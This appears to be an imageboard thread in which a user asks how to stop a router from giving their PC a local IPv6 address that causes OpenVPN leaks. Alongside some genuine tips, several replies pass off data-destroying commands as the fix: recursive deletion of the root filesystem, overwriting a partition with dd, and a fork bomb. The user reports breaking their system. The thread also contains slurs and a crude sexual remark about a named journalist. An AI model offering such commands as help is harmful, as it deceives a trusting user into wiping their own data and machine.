How can i disable this shit...

How can i disable this shit? My router gets an IPV6 address from my ISP but it also annoyingly assigns a local iPV6 address to my PC. I don't want it doing that because it causes openvpn to leak. How can i stop my router from assigning my PC a local IPV6?

>inb4 disable it in the router
It doesn't have any option to do that.

Internet is overrated anyway, just cut the cable to your router.

I download several websites onto floppy discs at my local library and read them in plain-text later on my superior non-networked commodore 486.

You are seeing this post because I use IP over Avian Carriers occasionally.

Assuming you're using Windows.
Go to: Control Panel\Network and Internet\Network Connections
Select your network, right click and select properties. Find IPv6 in the properties list, turn off the checkbox.

Not sure what router firmware you have, but I completely disable IPv6 from the router's control panel.

Whoops, skimmed the OP. Forget what I suggested.

What is ip6tables?

im on loonix.

Oh, in that case, open a terminal and type
sudo rm -rf /

No, it's
rm -rf --no-preserve-root /

No. Boot from live cd and do
dd if=/dev/null of=/dev/%your-partition%
BS=1M

Ubuntu is cancer.

wtf now nothing works. i can't even log off.

Agreed. That's why I use deboon.

I hope this is real.

So? I guarantee that your router will now be unable to assign an IPv6 address to your computer. That's what you asked for.

Lol'd

Who is this semen demon? Also there are many products still made in the states of US of A

>im on loonix.
Oh, in that case type this in your terminal:
:{ : | : &};:

Easy peasy

>Plethra of information on screen
>2018
>still asks for sauce

Well what router are you using?

Sophie Shevardnadze, propagandist on Russia Today. She has an interview show called Sophie & Co.

>Who is this semen demon?

>/%your-partition%

leave it to winfags to post utter garbage and also cargo cult by using dd instead of cp and probably not even knowing the difference.

>if=/dev/null
Ikr. If even he knew that the likely drive is sda.